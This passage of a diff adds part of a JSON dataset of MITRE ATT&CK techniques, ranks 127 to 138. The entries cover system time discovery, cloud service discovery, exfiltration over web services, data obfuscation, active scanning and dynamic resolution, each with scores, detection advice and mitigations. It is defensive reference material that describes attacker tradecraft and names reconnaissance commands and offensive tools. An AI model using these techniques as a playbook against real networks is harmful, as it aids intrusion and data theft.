DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.", + "score": 0.5369142857142857, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 127, + "tid": "T1124", + "name": "System Time Discovery", + "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)\nSystem time information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service)\nThis information could be useful for performing other techniques, such as executing a file with a Scheduled Task/Job (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. System Location Discovery). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)", + "url": "https://attack.mitre.org/techniques/T1124", + "detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.", + "score": 0.5312095238095238, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 128, + "tid": "T1526", + "name": "Cloud Service Discovery", + "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. \nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)", + "url": "https://attack.mitre.org/techniques/T1526", + "detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.", + "score": 0.5285714285714286, + "process_score": 0.2, + "hardware_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 129, + "tid": "T1531", + "name": "Account Access Removal", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\nAdversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)", + "url": "https://attack.mitre.org/techniques/T1531", + "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of Net. Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n
    \n
  • Event ID 4723 - An attempt was made to change an account's password
    • \n
  • Event ID 4724 - An attempt was made to reset an account's password
    • \n
  • Event ID 4726 - A user account was deleted
    • \n
  • Event ID 4740 - A user account was locked out
    • \n
\nAlerting on Net and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.", + "score": 0.5283571428571429, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 130, + "tid": "T1119", + "name": "Automated Collection", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \nThis technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files.", + "url": "https://attack.mitre.org/techniques/T1119", + "detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as Data Staged. As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.5203063442857143, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ], + "subtechniques": [] + }, + { + "rank": 131, + "tid": "T1480", + "name": "Execution Guardrails", + "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.", + "url": "https://attack.mitre.org/techniques/T1480", + "detection": "Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", + "score": 0.5198, + "network_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1055", + "name": "Do Not Mitigate", + "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.", + "url": "https://attack.mitre.org/mitigations/M1055" + } + ], + "subtechniques": [ + { + "tid": "T1480.001", + "name": "Execution Guardrails: Environmental Keying", + "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of Execution Guardrails that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\nSimilar to Obfuscated Files or Information, adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\nLike other Execution Guardrails, environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.", + "url": "https://attack.mitre.org/techniques/T1480/001", + "detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", + "mitigations": [ + { + "mid": "M1055", + "name": "Do Not Mitigate", + "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.", + "url": "https://attack.mitre.org/mitigations/M1055" + } + ] + } + ] + }, + { + "rank": 132, + "tid": "T1006", + "name": "Direct Volume Access", + "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)", + "url": "https://attack.mitre.org/techniques/T1006", + "detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through PowerShell, additional logging of PowerShell scripts is recommended.", + "score": 0.5095238095238095, + "process_score": 0.2, + "hardware_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 133, + "tid": "T1185", + "name": "Browser Session Hijacking", + "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as Sharepoint or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)", + "url": "https://attack.mitre.org/techniques/T1185", + "detection": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for Process Injection against browser applications.", + "score": 0.50401915, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "subtechniques": [] + }, + { + "rank": 134, + "tid": "T1567", + "name": "Exfiltration Over Web Service", + "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "url": "https://attack.mitre.org/techniques/T1567", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", + "score": 0.5, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ], + "subtechniques": [ + { + "tid": "T1567.001", + "name": "Exfiltration Over Web Service: Exfiltration to Code Repository", + "description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ", + "url": "https://attack.mitre.org/techniques/T1567/001", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + }, + { + "tid": "T1567.002", + "name": "Exfiltration Over Web Service: Exfiltration to Cloud Storage", + "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ", + "url": "https://attack.mitre.org/techniques/T1567/002", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + } + ] + }, + { + "rank": 135, + "tid": "T1001", + "name": "Data Obfuscation", + "description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ", + "url": "https://attack.mitre.org/techniques/T1001", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "score": 0.49729175571428574, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [ + { + "tid": "T1001.001", + "name": "Data Obfuscation: Junk Data", + "description": "Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ", + "url": "https://attack.mitre.org/techniques/T1001/001", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1001.002", + "name": "Data Obfuscation: Steganography", + "description": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. ", + "url": "https://attack.mitre.org/techniques/T1001/002", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1001.003", + "name": "Data Obfuscation: Protocol Impersonation", + "description": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. \nAdversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. ", + "url": "https://attack.mitre.org/techniques/T1001/003", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + } + ] + }, + { + "rank": 136, + "tid": "T1595", + "name": "Active Scanning", + "description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Exploit Public-Facing Application).", + "url": "https://attack.mitre.org/techniques/T1595", + "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "score": 0.4941285714285714, + "network_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1595.001", + "name": "Active Scanning: Scanning IP Blocks", + "description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\nAdversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services).", + "url": "https://attack.mitre.org/techniques/T1595/001", + "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1595.002", + "name": "Active Scanning: Vulnerability Scanning", + "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\nThese scans may also include more broad attempts to Gather Victim Host Information that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Exploit Public-Facing Application).", + "url": "https://attack.mitre.org/techniques/T1595/002", + "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 137, + "tid": "T1568", + "name": "Dynamic Resolution", + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\nAdversaries may use dynamic resolution for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "url": "https://attack.mitre.org/techniques/T1568", + "detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", + "score": 0.47380952380952385, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [ + { + "tid": "T1568.001", + "name": "Dynamic Resolution: Fast Flux DNS", + "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.", + "url": "https://attack.mitre.org/techniques/T1568/001", + "detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.", + "mitigations": [] + }, + { + "tid": "T1568.002", + "name": "Dynamic Resolution: Domain Generation Algorithms", + "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\nAdversaries may use DGAs for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "url": "https://attack.mitre.org/techniques/T1568/002", + "detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1568.003", + "name": "Dynamic Resolution: DNS Calculation", + "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\nOne implementation of DNS Calculation is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)", + "url": "https://attack.mitre.org/techniques/T1568/003", + "detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.", + "mitigations": [] + } + ] + }, + { + "rank": 138, + "tid": "T1601", + "name": "Modify System Image", + "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.", + "url": "https://attack.mitre.org/techniques/T1601", + "detection": "Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with Patch System Image, it may be appropriate to also verify the integrity of the vendor provided operating system image file. \nCompare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - 